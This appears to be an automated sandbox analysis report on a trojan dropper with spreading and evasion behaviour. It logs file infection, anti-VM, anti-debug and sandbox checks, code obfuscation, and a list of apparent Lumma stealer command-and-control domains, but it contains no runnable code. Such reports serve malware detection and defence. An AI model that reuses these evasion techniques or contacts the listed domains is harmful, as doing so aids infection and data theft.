Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: Section: ZLIB complexity 1.0038910505836576
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: Section: ZLIB complexity 0.9985546038543898
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: Section: ZLIB complexity 0.9984027121296085

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@5/11@8/1

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_0032119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_0032119F

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5352

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

File created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Lisect_AVT_24003_G1A_72.exe

Virustotal: Detection: 86%

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

File read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe"
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Jump to behavior

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Lisect_AVT_24003_G1A_72.exe

Static file information: File size 4900864 > 1048576

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x383026

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Unpacked PE file: 2.2.jawuwAtX.exe.320000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: #bu

PE file contains sections with non-standard names

Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: .imports
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: .themida
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: .boot
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: #bu
Source: jawuwAtX.exe.0.dr	Static PE information: section name: .aspack
Source: jawuwAtX.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.2.dr	Static PE information: section name: u

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00321638 push dword ptr [00323084h]; ret	2_2_0032170E
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00326014 push 003214E1h; ret	2_2_00326425
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00322D9B push ecx; ret	2_2_00322DAB
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_0032600A push ebp; ret	2_2_0032600D

Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: entropy: 7.9668438970178
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: #bu entropy: 6.935155293246564
Source: jawuwAtX.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.934455585546093
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.934357838115891
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.9340336005643985

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	File created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 799

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Jump to behavior

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe TID: 5204	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe TID: 5204	Thread sleep time: -30000s >= -30000s			Jump to behavior

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00321718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00321754h

2_2_00321718

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_003229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_003229E2

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00322B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00322B8C

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4=
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001041000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001041000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0T
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe	Process queried: DebugObjectHandle	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: strainriskpropos.stor
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: telephoneverdictyow.site
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: punchtelephoneverdi.stor
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: smallrabbitcrossing.site
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: snuggleapplicationswo.fun
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: theoryapparatusjuko.fun
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: healthproline.pro

Source: SciTE.exe.2.dr

